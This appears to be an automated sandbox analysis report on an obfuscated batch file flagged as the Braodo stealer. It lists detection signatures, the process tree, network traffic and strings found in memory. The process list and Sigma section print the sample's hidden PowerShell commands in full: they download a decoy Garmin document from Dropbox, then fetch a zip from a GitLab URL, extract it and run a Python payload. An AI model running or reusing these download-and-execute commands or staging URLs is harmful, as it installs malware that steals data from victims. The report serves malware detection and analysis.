Windows Analysis Report
fghdsdf17.bat

Overview

General Information

Sample name: fghdsdf17.bat
Analysis ID: 1578278
MD5: 065d7356dd69172c50ad447904d19df9
SHA1: 034f82a55696405a385720b6d5b0e669881dbbf6
SHA256: 016e96cc8d72183ca8d8f2b00c3effaac50f44888504d38519dc7dbfc062f64d
Tags: bat, Braodo, user-JAMESWT_MHT

Detection

Abobus Obfuscator, Braodo
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 5892 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 2168 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • cmd.exe (PID: 2344 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • find.exe (PID: 3276 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 2396 cmdline: findstr /L /I set "C:\Users\user\Desktop\fghdsdf17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 2340 cmdline: findstr /L /I goto "C:\Users\user\Desktop\fghdsdf17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 4100 cmdline: findstr /L /I echo "C:\Users\user\Desktop\fghdsdf17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 2500 cmdline: findstr /L /I pause "C:\Users\user\Desktop\fghdsdf17.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • find.exe (PID: 4824 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 2952 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 3324 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5616 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5512 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4808 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2828 cmdline: powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author)

  • fghdsdf17.bat | JoeSecurity_AbobusObfuscator | Yara detected Abobus Obfuscator | Joe Security
  • Process Memory Space: powershell.exe PID: 3324 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • Process Memory Space: powershell.exe PID: 5512 | JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security
  • Process Memory Space: powershell.exe PID: 5512 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • amsi64_3324.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • amsi64_5512.amsi.csv | JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security
  • amsi64_5512.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • amsi64_2828.amsi.csv | JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security

                  System Summary

Sigma matches, in report order. Six of the seven matches fire on the same process-start event of powershell.exe (ProcessId 3324); its event data is listed once below and only the rule authors differ per match.

  Shared process-start event data:
    Command / CommandLine / ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
    CommandLine|base64offset|contains: hv)^
    Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" "
    ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5892, ParentProcessName: cmd.exe
    ProcessId: 3324, ProcessName: powershell.exe

  • Source: Process started; Author: Florian Roth (Nextron Systems); Data: shared process-start event above
  • Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: shared process-start event above
  • Source: File created; Author: Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5512, TargetFilename: C:\Users\Public\Document.zip
  • Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: shared process-start event above
  • Source: Process started; Author: Florian Roth (Nextron Systems); Data: shared process-start event above
  • Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: shared process-start event above
  • Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: shared process-start event above

No Suricata rule has matched

                  AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.0% probability
Source: unknown; HTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: global traffic; HTTP traffic detected: GET /scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 HTTP/1.1, Host: www.dropbox.com, Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /garvdsf/dsfg/-/raw/main/FGa1712.zip HTTP/1.1, Host: gitlab.com, Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 172.65.251.78
Source: Joe Sandbox View; IP Address: 162.125.69.18
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported three times)
                  Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                  Source: global trafficDNS traffic detected: DNS query: uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: gitlab.com
                  Source: powershell.exe, 0000000C.00000002.1528813287.0000020CF64A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF82E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501660000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
                  Source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                  Source: powershell.exe, 0000000C.00000002.1525054616.0000020CEE22E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1525054616.0000020CEE371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDFBAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C5101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C5019CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C51006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A31367F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDE1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A311CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF82E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                  Source: powershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDE1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A311CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
                  Source: powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                  Source: powershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C500C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com(
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
                  Source: powershell.exe, 0000000E.00000002.1658951690.000002C56E273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip
                  Source: powershell.exe, 0000000E.00000002.1662213672.000002C5700E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zip
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/users/sign_in
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF340000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A312E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
                  Source: powershell.exe, 0000000C.00000002.1525054616.0000020CEE22E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1525054616.0000020CEE371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDFBAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C5101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C5019CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C51006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A31367F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
